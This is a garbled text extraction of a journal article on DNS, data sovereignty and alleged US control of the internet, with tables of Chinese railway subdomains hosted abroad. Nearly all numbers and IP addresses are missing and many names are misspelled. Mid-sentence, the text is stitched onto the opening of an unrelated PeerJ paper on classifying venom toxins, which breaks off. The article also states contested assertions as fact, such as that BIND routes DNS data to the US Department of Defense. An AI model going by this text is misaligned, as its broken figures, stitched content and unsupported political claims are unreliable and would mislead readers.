new phase, and a new generation in control community. the asia pacific network information center (apnic) state: “we hope that all operators of authoritative dnssec (dns security extension) servers will be able to successfully update their dns system software and seamlessly transfer to the next years of dns era.” the london school of economics and political science (lse) published an article entitled “china and the domain name system” in march stating,“in terms of information and communication technology (ict), dns is an ‘inherently political’ technology. because of its ability to allocate, store, and resolve internet addresses, it is undoubtedly an important fountain of political power; and dns is mainly for the assurance of the latent capacity to conduct successful communication between standardized technologies and system and the avoidance of duplicate allocation of a same network address. ‘inherently political’ technologies also characterized by the high concentration of dns technology itself. therefore, these who possess the centralized technology of dns will seize the power and dominance in cyberspace.” b. to dispense with the “next internet ipng” the united states has released a series of planned preparations and foreshadows for the implementation of the "next -year dns era", including the deployment of "recognition" for the internet development. ) to abandon ipv as “next generation internet protocols”, this lasts for nearly years on july , , the us internet engineering task force (ietf) released document rfc , announcing the latest official standard for the sixth edition of the internet protocol (ipv ) (code: std ).the document rfc (the draft ipv specification) proposed in december and the “next generation internet protocol ipng” which was originally for the transition to ipv abandoned and removed. the us internet regional working group pointed out: “in the past few years, the widespread implementation of new data protection regulations around the world is beginning to make inroads on technology companies and consumers worldwide, resulting the change to bad practices of some formerly established best methods required by ietf procedures and regulations.”that is to say, the dramatic changes in the global network application environment have caused dramatic changes in the network technology frames and user needs, “which led to the inevitability and necessity of abolishing drafts (protocols) and transitional measures (plans) with ipv in the “next generation of internet ”, showing that the document rfc no. is based not only on the objective summary and generalization of the history and status of the internet but the adherence to the principle of “us first” and the maintenance of “the supremacy of us interests”, the aim of cyberspace strategy and the security bottom line. in the united states, the transition to ipv proposed with a pretext of the "insufficient number of ipv addresses"; the “ipv draft specification” and “next generation internet ipng” transition plan now abandoned based on the same principles. the reason being not simply in the design of network technology architecture; nor in the strategic error of network international journal of advanced network, monitoring and controls volume , no. , deployment, but a major deployment to deepen and refine the us network hegemony, and a fundamental decision to reaffirm the “inherently political” trait of the internet. correspondingly, the ksk and dns domain name system extension mechanism (edns), which controls the dns domain name system security extension (dnssec), are the premise and the foundation for establishing and consolidating the core role and status of dns in the "next generation internet ". ) the release of three basic principles advocated by ietf intellectual property rights in may , the us internet engineering task force (ietf) issued the official document rfc (bcp ), the “intellectual property rights in ietf technology”, providing three basic principles in handling internet intellectual property problems and discarding document rfc and rfc . therfc document stipulates: a) the ietf will make no determination about the validity of any particular ipr claim. b) the ietf, following normal processes, can decide to use technology for which ipr disclosures been made if it decides that such a use is warranted. c) in order for a working group and the rest of the ietf have the information needed to make an informed decision about the use of particular technology. all those contributing to the working group’s discussions must disclose the existence of any ipr the contributor or any other ietf participant believes covers or may ultimately cover the technology under discussion. this applies to both contributors and other participants, and applies whether they contribute in person, via email, or by other means. the requirement applies to all ipr of the participant, the participant’s employer, sponsor, or others represented by the participant that reasonably and personally known to the participant. no patent search is required. that is to say, “the internet is mine, and the rules are made by me.” ietf is legitimate to choose technology that has not intellectual property rights claimed yet, or freely licensed intellectual property technology; ietf can adopt any technology with no promise of any technology license. indicating that technology adopted by the ietf in internet engineering applications is free from the restriction of intellectual property rights and ownership owners. it only determined by the ietf whether the technology adopted by the internet is “compliant”; technology and any application of intellectual property rights are invalid and non-compliant without the consent of the ietf, and the ietf will not admit it. it is commonplace for the ietf to enforce the utterance of security technology in its technical specifications. the release of the three principles of intellectual property rights is only a public announcement of the “removing the burning brands from under the boiling cauldron”, “overweening” and “getting my own way” strategies. until november , the us patent and trademark office (uspto) granted , patents for ipv related technologies, and the european patent office (epo) granted , . the abrogation of ietf for ipv as the "next generation internet protocol" and its decision to implement a global “dns execution day” and the practice of arbitrarily shutting down the best servers of other countries (such as iraq and libya, disconnecting the network and services. no matter how powerful the intellectual property rights are, no matter who grants intellectual property rights to them and who's intellectual property rights are, the three principles of intellectual property rights of ietf, the us civil society organization, are placed on the authority of the government to protect intellectual property rights and the authority of the regulatory agencies. they are absolute dominate and the only "compliance" to the internet. the principle of “us priority” and “us interest first” and the bottom line always placed beyond international journal of advanced network, monitoring and controls volume , no. , everything else, too is the cyberspace hegemony to maintain the internet “one network for all” policy. ii. legal competition for data sovereignty the three basic dimensions that make up cyberspace are the infrastructure-centered physical dimension, the data-centric information dimension, and the cognitive dimension centered on human behavior. for more than half a century, irreversible evolution have taken place, from industrialization to socialization, from commercialization to customization, and the quality-quantity evolution from technology-driven to data-driven, especially the dominance and influence of marginal politic power have become increasingly prominent. the united nations internet governance (igf) organization has approved the global internet and jurisdiction policy network (i&j) as an “open forum” with more than key entities from different stakeholders around the world participated, including governments and networks enterprises, technical groups, civil organizations, academic institutions and international institutions (for some reason, no chinese organization participated), with the focus of research and discussion being “the jurisdiction of data” for three consecutive i & j annual meetings (including the upcoming annual meeting in june ) . in october , the european court of justice (ecj) made a landmark ruling that overturned the “safe harbor “mechanism proposed by the european commission at the beginning of this century and has utilized by more than , companies, including ibm, google and ericsson. according to the european court of justice, the "safe harbor" mechanism does not provide adequate protection for the personal data of eu citizens, because the united states often violates the privacy protection measures established by the mechanism in the name of national security, public interest and law enforcement needs. uk is the one with the highest penetration rate of the internet economy in the g countries. the goal of the uk government is to make uk the safest country to conduct online business activities, and the government holds that the level and duration of protection for personal data should be improve simultaneously when the amount of personal data is keeping increased by the development of digital economy. on august , , the uk department of digital, cultural media and sports issued a report titled “new data protection act: our reforms”, which passed the new data protection law to update and enforce the personal data protection in the digital economy era and to replace the data protection act. the general data protection regulations (gdpr) adopted by the european parliament came into effect on may , . the regulation extends the data protection from subordinates to owners, refines the classification of personal private data, clarifies the “consent” requirements of the data subject, and guarantees the individual’s access to the data, the right to restrict processing and the right to refuse data using, and “portable rights" (obtaining a copy of personal data processing), "erasing rights" (also known as the right to be forgotten). severe high-limit penalties have been imposed for data managers and processors who violate the law to negate data owner rights, to restrict data processing, to interrupt data transmission or to prohibit data access. trump is in a tit for tat, and signed the clarify lawful overseas use of data (cloud) on march , ; two months in advance of the european union, requiring the us federal bureau of investigation (fbi) and other law enforcement agencies have the right to get access to internet data worldwide. the bill holds that timely access to electronic data provided by communication service providers is the key to the us governments for protecting public safety and combating major crimes, including terrorism; the international journal of advanced network, monitoring and controls volume , no. , communication service providers that regulate, control or own such data should subject to the us law. the bill also allows other countries to store personal data of non-us citizens in the united states. according to professionals, the bill gives us law enforcement agencies infinite priority for administrating any data controlled by the service provider, regardless of where the data is stored and where it created. in other words, the clarify lawful overseas use of data holds that the us government, usa companies and institutions are legal and legitimate in accessing any data in the world to be prosecuted and punished against the eu general data protection regulations. . the year , it called the “first world data protection year”. undoubtedly, the protection of data sovereignty and security has risen to the battle for national sovereignty and security. what we have seen is still the battle for cyberspace data that dominated by “us priority”, “us interest first”. “dns execution day” indicates that the cyberspace data battle has penetrated into the control and command system of the internet in all directions. nomine, one of the world's three largest network information centers, is one of the world's first professional cctld (country code top level domain) operators. the uk’s .uk domain name management and registration agency founded in may . nomine believes that dns plays a vital role in every network – it sets the technical standard for translating human-readable domain names into machine-aware internet protocol (ip) addresses. in other words, dns is the underlying backbone platform of network data operations, applications, services, and security. the dispute between data sovereignty and security must first involve the dispute over the control, command, standard, and initiative and discourse power of the dns. the “dns execution day” is the inevitable result of data sovereignty competition. the united states yields none in cyberspace data, not only in technology but also in the performance and implementation at the legal level. iii. china's network data has major security risks a. servers generally hosted outside the country when observing reversely, china is obviously lagging behind in maintaining data sovereignty and security, protecting data, paying attention to and using data. in the form of insufficient emphasis on law, owner management, and governance of data, many institutions and officials who rely on data and contact with data all day are ignorant of the principles, bottom lines, key points, methods, and approaches of data protection. they are politically confused; formality adhered, technically exaggerated, and lazy in management. according to national information center’s continuous real-time monitoring based on dns open source information, there is a top-down tendency in china’s party and government organs, state-owned enterprises, well-known websites (service providers) and other servers with their servers indirectly or directly hosted outside the country. in recent years, there is a large number of data leakages in citizens' personal data, corporate data, national data, and other data involving important economic, political, social, cultural, military and other sensitive industries. some enterprises provide exclusive services of domestic servers hosting to overseas, and content delivery network (cdn) services, without any scruples and hesitation. in , china ranked first in the top countries of data leaking. the main member including baidu with billion user phone numbers, names and addresses; notecase’s . billion email addresses and user passwords sold on the internet; shanghai chonju’s million email addresses and phone numbers; ten cent’s million email address and international journal of advanced network, monitoring and controls volume , no. , user password sold on the network and the like. so far, how do did they reflect and rectify, and how did the government regulatory department investigate and handle with they remain unknown. however, the online articles that disclosed the truth of the leaked data were quickly delete, and the websites that published the articles were under great pressure. not only are the rights of the individuals and units that have leaked data at least not respected and protected, but the national data security issue is actually “turned to domestic sales” after being discovered and alerted by the outside world. it is really a strange thing. on october , , wiki leaks published amazon’s “highly confidential” internal file "amazon atlas." the document lists the address and operational details of more than amazon data centers in cities across nine countries, among them nine data centers are in china with six in beijing. in , amazon signed a contract with the us central intelligence agency (cia) to build a “cloud” for intelligence agencies to integrate and provide information classified as “top secret”. amazon also operates a special gov cloud area (government cloud) for the us government. amazon's government cloud center in china is located in ningxia province. many local development zones and high-tech zones have numbly invited amazon to set up data centers in the region to publicize and provide “business” training for free servers hosting. on november , , amazon publicly announced that it would provide a "cloud" service to the cia and its intelligence system (ic) members, known as the "amazon secret service" (aws secret region). amazon called the service “the first and the only commercial cloud providing the government with a comprehensive data classification service, including non-confidential, sensitive, confidential, top secret data”. amazon is the only company required to certify confidential data in the "cloud". the net ease mail server hosted on amazon's aws service platform. the server is hosted outside the country, on amazon,, meaning that the path and system relying on the dns domain name address translation and resolution depend ocean penetrate (leap) china's “firewall”, with no need to go through the “mirror” in china (with no traces left).it avoid the various monitoring and supervision in china, and the big data managed by the host can be selectively filtered and then “pushed” back to the “cloud” operated b china. b. revolving doors abound in the early years, some college elites in the united states changed their status and became national politicians. some senior generals retired as multinational entrepreneurs or scientific research leaders. they considered the "revolving doors" of identity conversion, which provided the possibility for the realization of the american dream. over the years, the concept and manipulation of the "revolving door" has applied to the internet. based on the situational awareness of dns real-time monitoring, the “revolving door” problem found in the servers and “cloud” centers of publicly known websites. the “vest effect” led by the domestic company and jointly produces the data flow to the outside is called the "inner revolving door", otherwise it is called the "outer revolving door". the original source data conducted in china hosted overseas, and the data pushed from overseas is the data being filtered (backup), and cached domestic. data leakage or malicious utilization are only in the moment of "revolving door", and we are often asking and arguing for whether the data is leaked, how much data leaked, "towing the library" or "collision library"..... please note that in recent years, the us department of justice, the federal bureau of investigation, and other public evidences of criminal prosecution of chinese citizens (including my national security officials, international students, researchers, entrepreneurs and the like) are mainly obtain through international journal of advanced network, monitoring and controls volume , no. , the "revolving door"-- open source data, information, and intelligence. the cdn cache server is an important technical model supporting “revolving doors”. it is the source to provide data (content) to the territory, and also the node that receives data (content) from outside the country. its open custom port potentially interacts with other countries. network intrusions and attacks often utilize custom port penetration. among ten cent’s mail servers (ipv addresses), of them belong to los angeles, with an autonomous system as , the owner being owner hurricane electric (he, hurricane electronics); and the rest in shenzhen, with an autonomous system as / , with the owner being ten cent itself. all servers have a "revolving door" function. apple has four major domain names in china. the “guizhou-cloud big data” page is www.colasoft.com.cnicloud.com.cn, and the other three addresses displayed on apple's official website. the "canonical name" of “guizhou-cloud big data” is www.icloud.com.cn.edgekey.net, the website in china is . . . (www.icloud.com.cn), and the owner is as (alibaba cloud). the ipv address . . . mapped to the ipv address . . . , and the owner is akamai corporation of the united states (a service provider with more than one-third of the cdn market in the world). the function of “guizhou-cloud big data” and the “revolving door” is very obvious and typical, and may involve deeper and broader cyberspace sovereignty and security issues. the alias of china railway ’s main website is www. .cn.lxdns.com, the website in china is . . . , the owner is as (china telecom), and the five dnss bound to the alias are all in the united states (as ).it is a typical dns-based content push network (dn-cdn); the domain name of the customer service center dynamic. .cn is hosted by the host’s ip address . . . (as ), the territory is actually taiwan (taipei) and the owner is incredibly the official network operator of taiwan, data communication business group. table i. some of china railway’s sub domain hosted in taiwan [ . . . ] sub-domain name (alias) standardize domain name ip address visible in the territory (a record) business (reference) dynamic. .cn dynamic. .cn.lxdns.com . . . customer service ad. .cn ad. .cn.wscdns.com . . . advertisement travel. .cn travel. .cn.wsglb .com . . . go out hotel. .cn hotel. .cn.wsglb .com . . . hotel wifi. .cn wifi. .cn.wsglb .com . . . radio communication test.wifi. .cn test.wifi. .cn.wscdns.com . . . test eximages. .cn eximages. .cn.wsglb .com . . . picture epay. .cn epay. .cn.lxdns.com . . . electronic payment expay. .cn expay. .cn.wsglb .com . . . epay-hy. .cn epay-hy. .cn.lxdns.com . . . exservice. .cn exservice. .cn.wsglb .com . . . hyfw. .cn hyfw. .cn.lxdns.com . . . international journal of advanced network, monitoring and controls volume , no. , china railways member service’s domain name cx. .cn managed by the host’s ip address . . . (as ), belonging to the united states (california), and the owner is quantil networks. table ii. some of china railway’s sub domain hosted in taiwan [ . . . ] sub-domain name (alias) standardize domain name ip address visible in the territory (a record) business (reference) cx. .cn cx. .cn.wsglb .com . . . member services video. .cn video. .cn.lxdns.com . . . video the above-mentioned hosting servers had opened and used the “tor the onion router” port defined by the internet assigned numbers authority (iana) specification. "onion routing" is an anonymity-orient, self-contained domain name system and proxy mechanism, mostly used for "dark net" and hackers. using tor the onion router to highlight the hosted mainframe will definitely increase risk of severe data leaking. according to the news released by the ministry of public security of china on january , there are million passengers during the national railway spring festival in , which far exceeds the us population ( million). the amount of data and information is considerable, and the value of open source intelligence is difficult to assess. if the united states and taiwan use this path to launch a network attack or hacker intrusion, it will be able to accurately locate and track any target, and the consequences are unimaginable. important note: iana was formerly managed by the national telecommunications and information administration (ntia) of the us department of commerce. the establishment of icann is to fulfill the duties of the iana. the functions of the two are different and mutually reinforcing, and must be implemented in accordance with the no-cost agreement signed with the ministry of commerce and they work well with each other. iana's functions are developed as part of the arpanet’s deployment of the us department of advanced defense research projects agency, including: ) coordinating the allocation of internet protocol’s technical parameters; ) fulfilling duties related to internet dns root zone management; ) assign an internet ip address. iv. the important inspiration provided by “dns implementation day” a. the bankruptcy of the “snowman plan” lie the “snowman plan” proposed and announced by icann in , its english name is “the yeti dns project”, i.e. the “snowman dns plan”. icann's best-known responsibilities and missions are to coordinate the global internet's unique identifier system as a technical coordinator for the internet domain name system (dns) to ensure the stable and secure operation of the unique identifier system. the "snowman dns program" website hosted by icann clearly states that the "snowman dns" system is a test platform for root domain name services and some experiments and will do not add/delete delegates in the iana root zone, and all resource records (resets) are identified by the "yeti” security extensions (dnssec) key, no alternate domain space is provided. paul dixie, proclaimed himself as the “father of domain names”, one of the founders of the snowman dns program, stressed and warned in that if the “snowman plan” is considered to be a domain name expansion, anyone in addition to iana will be able to effectively edit the top-level domain space, such as adding a new top-level domain (tld) or changing the ownership of an existing top-level domain (tld). the international journal of advanced network, monitoring and controls volume , no. , answer is definitely not; if you touch it (to instead the root domain name service), you will die; and if a certain country wants to create its own internet dns system, independence will be unhealthy, vulgar and short-lived. paul's "snowman dns" working mode: figure . snowman dns working mode for a long time some professionals and government officials in china spare no effort to advocate that the “snowman plan” is led by chin, represented by beijing tinder interconnect information technology co. ltd. (bii group), and claimed that china had “built a global ipv root server network and demonstrating a new ipv root server capabilities”, “china deployed four ipv -based root servers, breaking the predicament of china with no root servers in the past.” and the like. ruthlessly, the "dns execution day" returned the "snowman plan" back to reality. the result of dns’s compliance announced the impeachment of the “snowman plan” in the beginning of the internet’s “the next years of the dns era"; or it was a “slapstick” exploited by someone. the practice makes “alternative routes for the domain name” unsustainable, as well as the melting of invest and foundation of the “snowman” (deceitful publicity and fake amounts) which lasts for more than three years. beijing tandy interconnect information technology co. ltd. (bii group)’s ipv domain name server compliance testing result ipv address: c:f: : : : a:c test result: fatal error detected dns=timeout edns=timeout edns =timeout edns@ =timeout ednsopt=timeout edns opt=timeout do=timeout ednsflags=timeout docookie=timeout edns tcp=timeout optlist=timeout a l l t e s t s a r e o u t o f o r d e r figure . result of ipv dns compliance testing it is worth pondering that the dns extension mechanism (edns) was proposed by paul in (rfc ) and became a standard in (rfc ). however, paul turned a blind eye to “snowman” deceitful technology, its non-compliant application and self-deprecating in the internet community (that is, the flexible workaround of the claimed “one world, one internet, one domain name system”). so where does the reason lie? is paul fooling the experts of the bii group or vice versa? or is there a tacit agreement between the two? the above facts also clearly reveal that the internet vitality based on ipv technology is still vigorous. for the united states, the “dns era of the next years” is still the ipv era. according to the “usg v status statistics” collected by the national institute of standards and technology (nist) until december , , only % of the us-supported ipv industries are still in operation in spite of the us government's nearly -year ipv transition plan, % of them have transitions or no progress; only % of us universities use ipv domain name operations, % of them have international journal of advanced network, monitoring and controls volume , no. , transitions or no progress, which is an abnormal dynamic that cannot be ignored. according to the apnic statistics, until october , , the rate of us ipv users has dropped from the first to the third worldwide, and china ranked st. according to google's monitoring, the adoption rate of ipv in the united states is actually a mere . %. the asia pacific network information center (apnic) report pointed out that from the second half of to august , the ipv deployment status had declined. operators who are under higher pressure of an ipv addresses shortage have a low ipv deployment rate, which does mean that there is no urgency to deploy ipv in a client/server (c/s) environment in many areas of the internet. in other words, the pressure of address shortage is not a sufficient and necessary prerequisite for deploying ipv on a large scale. entrusted by the office of the chief technology officer (octo) of the internet corporation for assigned names and numbers (icann), the internet governance projects group (igp) of the institute of public policy at the georgia institute of technology published a survey report entitled “latent standard war” in february , the research analysis found that it’s not a “transition” issue that makes sense between ipv and ipv , but economic disputes between the two routes in technological evolution; and the current lopsided ipv deployment rate and the relevant data violates a simple or predictable pattern. according to “supporting china's ipv scale deployment - china's ipv service end-to-end user experience monitoring report” released by china's “national next generation internet industry technology innovation strategic alliance” on november , , there are . million ipv active users (ipv allocated and with ipv internet history records within one year) with mobile broadband and . million with fixed broadband, . million in total. according to the “promoting the scale of ipv deployment” requirements to reach a million at the end of , the current number is still far behind. ipv subverts the situation of ipv network application architecture, and it is difficult to solve a large number of known and unknown security traps and security barriers.: huge investment and operation and maintenance costs, and the economic benefit in the future is distant no matter whether it is market economy or planned economy; the balance of trade-offs. it is imperative to re-adjust the strategy of deploying ipv in a realistic manner. our country must make an early decision. in the face of well-known and irrefutable facts, what will the beijing tandy interconnect information technology co. ltd. (bii group)’s experts say? self-defense or explanation? should the administrative, law enforcement, auditing, and supervision departments of the state and governments at all levels seriously perform their duties? b. bind is the key and crucial part the us defense advanced research projects agency (darpa) funded the development of bind in and bind, which was taken over by the us internet systems alliance (isc) after , is the most important core step and strategic deployment of the internet. it is for not only the "kidnapping" of the dns hub platform, but also for the close integration in the "soft and hard" aspects, firmly grasping and controlling the ownership, command, control and decision-making power of the dns. bind has embedded in the dns and has become the “de facto standard” for dns bundled applications. the global software market, which dominates dns applications, is not only a “traffic light” rule that guides the flow of internet data, but also a baton that conducts compulsory obedience if you have “bad behavior”; you will be in violation of the law, get lost, embarrassed, and chaotic or hit the wall. international journal of advanced network, monitoring and controls volume , no. , figure . structure of bind the picture above shows that under the role of bind (control command guiding software interconnection and interoperability), the dns application drives the recursive server, the recursive domain name server and the domain name resolution system perform conduct three irreversible domain name resolution iterations by "right to left" interaction process. however, any of these links may be eavesdropped, stolen, tampered with or transferred. it may also be a "safe information exchange" after being "legally mirrored" by the hierarchical service providers. it is “sifter-type” vulnerability that professionals must have knowledge of it. the us department of defense uses the domain name system to set the internet logical boundary, and the us department of defense network information center (dod network information center) operates and manages the military-specific network nipr net. bind (developed by the us department of defense), which is solidified in dns, was targeted to the data flow to the us department of defense network information center firstly and then to other network information center nodes such as intelligence departments. we must pay attention that the process dns request data (and information) is identical during the parsing interaction. some experts explained that: “the content stored in the root server is very few. usually, ordinary users will not access the root server when they surf the internet.” if it is not an ignorant mistake, it must be intentionally misleading. given the information on may , , when the “wandacry” ransom ware incident spread rapidly in international journal of advanced network, monitoring and controls volume , no. , more than countries and regions around the world. a british engineer stumbled upon the "want to cry" virus through domain name to conduct command and control (c&c), and used the "kill switch" method to effectively curb the “wandacry” virus, which was praised by the industry and the media as an “accidental hero”. at the same time, the world has realized the bind solidified” end switch” function of the dns. “termination switch” is a new internet term or a network hot word involving data sovereignty, network security, and internet governance. the exact definition of internet kills which is: a control mechanism designed to be activated as a countermeasure to shut down all or part of the internet traffic. us senator joe lieberman and other people submitted a legislative proposal “protecting cyberspace as a nationalization act asset act of )” (s. ) at the th congress on june , , was called by the media as the internet termination switch act. the electronic privacy information center (epic) of the american civil human rights organization began to track the us government's standard operating procedure secret plan document in . the -page “emergency radio protocols” drafted by the national telecommunications coordination center (ncc) and approved by the national communications system (ncs), proposes the process to “close and restore commercial and private wireless network when the country is in crisis.” it represents the policy of the us government and is also called the "internet kill switch" by the industry and the media. icann's official website published a passage entitled “what is the internet termination switch? who has the key?”on july , , clarifying that the internet "termination switch" is in the domain name root zone and icann holds the key. russian experts call it the “red button of the internet.” europe, russia and other countries have been highly vigilant against the us control and command to solidify bind's dns. the nsd developed by nlnet lab in the netherlands based on bind standards. although the technology research and the support are relatively independent, it has not yet to form a mainstream. but at least, from the perspective of dns application, it is possible to avoid “all eggs in one basket” and reduce risks; and from the perspective of open cooperation, research and development of controllable technologies and products can lead to the balance of different companies and seek a balances; in the long run, it is beneficial to the internet domain “building” to balance of dns control. russia recently announced that it will take the test out of the global internet in the near future (april ). the focus and purpose is to check the content blocked by the traffic, to ensure that the traffic between russian users (more than %) remains in the country, and it can only be the necessary countermeasures about research and development to control parallel dns. our country should catch up. while drawing on and utilizing bind in the united states and nsd in europe, we can encourage the reference to the boundary and frontier security defense measures of the "einstein " plan, and cut into the situational awareness based on real-time monitoring of dns open source data information to accumulate experience, and re-recognize and explore the source of governance and control of the internet, strive to develop the dns system software that is self-controllable and compatible (check and balance) for both bind and nsd. c. data sovereignty and security are the key point in summary, data sovereignty has become the consensus and action of the united states, the european union, and many countries (including the legislation and governance), especially after the “prism gate”, it becomes the important “topflight” without the principle of data sovereignty, not only is data international journal of advanced network, monitoring and controls volume , no. , security and privacy at risk, but national data assets are inevitably threatened. in particular, it should be pointed out that the “interconnection” of the internet today is conditional and bordered! for example, china's ip address is used as a “blacklist” by some professional websites outside the country, and the access to it is prohibited ( , no access authorization). the general identification of data sovereignty is: the government’s control over the collection of data in the country, including data residency (the location where data is forced to store), data retention (the compulsory reservation of data trade records). the united states is the initiator of the internet. at first, it was introduced from the military apa network to the european internet in order to transmit open source data (information, intelligence). for more than half a century, the united states has built and developed the internet; the technological innovation is always about data sovereignty, data security and data utilization (acquiring intelligence)--all for data. even from this perspective, we must re-recognize and deepen our understanding of the relationship between united states and the internet, the world and the internet, china and the internet in all ways. we are obviously seriously lagging behind when we continue to follow the understanding, and thinking of the internet or years ago in the united states and the situation even becomes more and more serious, ruthlessly ignoring our innovation and entrepreneurship in cyberspace, making us just wait and see again and again. being completely marginalized, the scientific advancement of the future network is gradually drifting away. today, any network technology carries data. network applications generate data; interconnections exchange data; network services face data; network innovation development (such as artificial intelligence) relies on data; network security (national security) protects data, data has been integrated into the driving force of human social development, building the collective assets, culture and language of the community. data, whether territorial or affiliated, has been transformed and applied in different degrees and at different levels “genetically modified”. the “face-changing” of data has become the norm and has become a subversive factor for maintaining or shaking the fundamentals of cyberspace sovereignty and security. most chinese citizens and officials are not sensitive enough to network data. they know nothing about cloud computing, big data, small probability events, open source information, and always think that there is no bearing between themselves and the unit, not to mention the full use of data, the urgent need to build and develop data centers, and the great importance of it. the dbs group study believes that the overall utilization rate of china's data centers is less than %, and the utilization rate of data centers in the lower cities is only a %. in the next - years, the demand for data centers will not be transferred to the data centers of the lower rate cities on a large scale. because of this, amazon, apple, microsoft, ibm, etc. have come to china to build data centers in the past few years, called china services, which are actually american services. ten cent, net ease, baidu, , railway and even party and government agencies have also been “managed” to overseas hosting servers in exchange for “free” advanced technology services and individual business interests in china. dns-based cdn (and sdn) technology has formed the mainstream and technology trends of the internet for years to come. in most network environments of national key information infrastructure, gatekeepers, firewalls, intrusion detection systems, anti-virus software are usually configured to control the data traffic of tcp/ip and other network protocols, and to implement the physical isolation (pni) between internal networks (private networks) and public internet. international journal of advanced network, monitoring and controls volume , no. , however, the rather universal stipulation and phenomenon deviate from the facts. cyber security threat exploits this cognitive misunderstanding and the blind spot of supervision, dns is used as a carrier to bypass the network security protection mechanism and transmit sensitive data from inside the enterprise to the outside of the enterprise. even the ""physically isolated” private network still relies on dns requests and responses to form an interaction between internal and external network (connection de facto). usually it is “unblocked” (such as firewall port ) and the commonly-held blind area (such as dns abuse, misuse), so that the abnormal behavior of intranet dns applications and information leakage through dns is basically out of control. figure . dns as a covert channel within protected networks in the diagram above of the us department of energy (doe), the “channels” of ( )-( )-( ) are inherent to the industry intranet and industry extranets, that is, part of the network system; (a)-(b) “channel” is caused by dns abuse or the existence of a loophole in the target terminal, that is, the application of chaos out of control (such as random use of google public dns service, . . . , etc.); ( )-( ) forms the hidden channel of dns that can be used not only as a transmission carrier for leaking data, but also as a means of command and control (c ) (such as apt). johnson from us secretary of homeland security reported in january that the einstein plan for the national cyber security system (ncps) began in and entered the third phase (called e a) in april . it not only monitors cyber attacks, but also has the ability to intercept and handle the confidential information; it can also effectively protect the government network’s security and respond to the most advanced network attack opponents. simultaneously e a provides a platform for new technology research and development, and cooperates with advanced technology and expertise of government departments and private industries to discover unknown network attacks. the us congress has mandated that all federal international journal of advanced network, monitoring and controls volume , no. , administrations join the e a program by the end of . "einstein- " (e a) provides four main functions: ) defense: real-time mitigation of already known or suspected cyber security threats; ) screening: identification of invaded information systems, system components or host terminals, as an immediate response to security incidents; ) perception: customized development, maintenance, and service for the network security status of the federal government information system, based on “security is normal monitoring”. ) discovery: monitoring and identifying new or emerging cyber security threats targeting federal government information systems to enhance cyber security defenses. it is recommended that the state should formulate and launch china's network sovereignty and security strategic plan based on "einstein- " (e a), using the existing network infrastructure to build an autonomous and controllable dns situational awareness system, and build china's data sovereignty, data security, and data utilized for the new cyberspace great wall. v. conclusion today's internet is facing a number of major changes. all countries are trying to grasp the latest technology for this revolution. as the united states announces the abandonment of the “next-generation internet ipng”, it marks the entrance to a new era for the internet. based on the current status of worldwide internet domain name system research, this paper analyzes the international research level of this technology, discusses internet security and data security problems we are now facing, and puts forward the importance of independent research and development of internet domain name system. at present, most of the servers in china are still hosted in foreign countries, which pose considerable, latent danger to data security. under the current environment of internet innovation, it is necessary to grasp the immediate opportunities and conduct research and development of the internet domain name system to ensure china's data sovereignty and information security, and keep pace with the internet development era. vi. acknowledgement this passage is written by the director of international strategic research center of china mobile communication federation; the chairman of nanjing huadao network technology co. ltd. submitted june accepted september published october corresponding author paul f. long, paul.long@kcl.ac.uk academic editor jaume bacardit additional information and declarations can be found on page doi . /peerj-cs. copyright gacesa et al. distributed under creative commons cc-by . open access machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions ranko gacesa , david j. barlow and paul f. long , , , institute of pharmaceutical science, king’s college london, london, united kingdom department of chemistry, king’s college london, london, united kingdom brazil institute, king’s college london, london, united kingdom faculdade de ciências farmacêuticas, universidade de são paulo, são paulo, brazil abstract ascribing function to sequence in the absence of biological data is an ongoing challenge in bioinformatics. differentiating the toxins of venomous animals from homologues having other physiological functions is particularly problematic as there are no universally accepted methods by which to attribute toxin function using sequence data alone. bioinformatics tools that do exist are difficult to implement for researchers with little bioinformatics training. here we announce a machine learning tool called ‘toxclassifier’ that enables simple and consistent discrimination of toxins from non-toxin sequences with > % accuracy and compare it to commonly used toxin annotation methods. ‘toxclassifer’ also reports the best-hit annotation allowing placement of a toxin into the most appropriate toxin protein family, or relates it to a non-toxic protein having the closest homology, giving enhanced curation of existing biological databases and new venomics projects. ‘toxclassifier’ is available for free, either to download (https://github.com/rgacesa/toxclassifier) or to use on a web-based server (http://bioserv .bioinfo.pbf.hr/toxclassifier/). subjects bioinformatics, computational biology, data mining and machine learning keywords protein sequences, biological function, animal venom, automatic annotation, functional prediction introduction falling costs of tandem mass spectrometry for shotgun proteomics have made generating vast amounts of protein sequence data increasingly affordable, yet the gap between obtaining these sequences and then assigning biological function to them continues to widen (bromberg et al., ). often, most sequences are deposited into protein databases with little, if any, accompanying experimental data from which biological functions can be inferred. customarily, biological function is deduced indirectly by comparing amino acid sequence similarity to other proteins in large databases to calculate a ranking of proteins with respect to the query sequence. using simple pair-wise comparisons as a sequence searching procedure, the blast suite of programs (for example, blastp) was first of its kind and has gained almost unprecedented acceptance among scientists (neumann, kumar & shalchian-tabrizi, ). variations of the blast algorithm (for instance, psi- blast (altschul et al., )) and development of probabilistic models (such as hidden how to cite this article gacesa et al. ( ), machine learning can differentiate venom toxins from other proteins having non-toxic physiological functions. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:paul.long@kcl.ac.uk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://github.com/rgacesa/toxclassifier http://bioserv .bioinfo.pbf.hr/toxclassifier/ http://dx.doi.org/ . /peerj-cs. markov models, hmms (krogh et al., )) use multiple sequence alignments to detect conserved sequences (also referred to as motifs). use of these models enables detection of remote homology between proteins seemingly unrelated when analysed by pairwise alignment alone (krogh et al., ). conversely, development of accurate algorithms and fast software tools that can automatically identify critical amino acid residues responsible for differences in protein function amongst sequences having exceptionally high sequence similarity remains a challenging problem for bioinformatics. in a post-genomic era, the toxins of venomous animals are an emerging paradigm. animal venoms comprise predominantly toxic peptides and proteins. duplication of genes that formerly encoded peptides and proteins having non-toxic physiological functions is one of the foremost evolutionary drivers that gives rise to the enormous functional diversity seen in animal venom toxins (fry, ; chang & duda, ). however, evidence is ambiguous as to whether these genes were expressed in multiple body tissues, with the duplicate copy then recruited into venom glands with subsequent neo-functionalisation to develop toxicity, or if there was duplication with ensuing sub-functionalisation of genes encoding pre-existing but non-toxic venom gland proteins (hargreaves et al., ). examples of both mechanisms have been demonstrated in different venomous animals (reyes-velasco et al., ; vonk et al., ; junqueira de azevedo et al., ). nonetheless, many toxin proteins that constitute venoms share a remarkable similarity to other 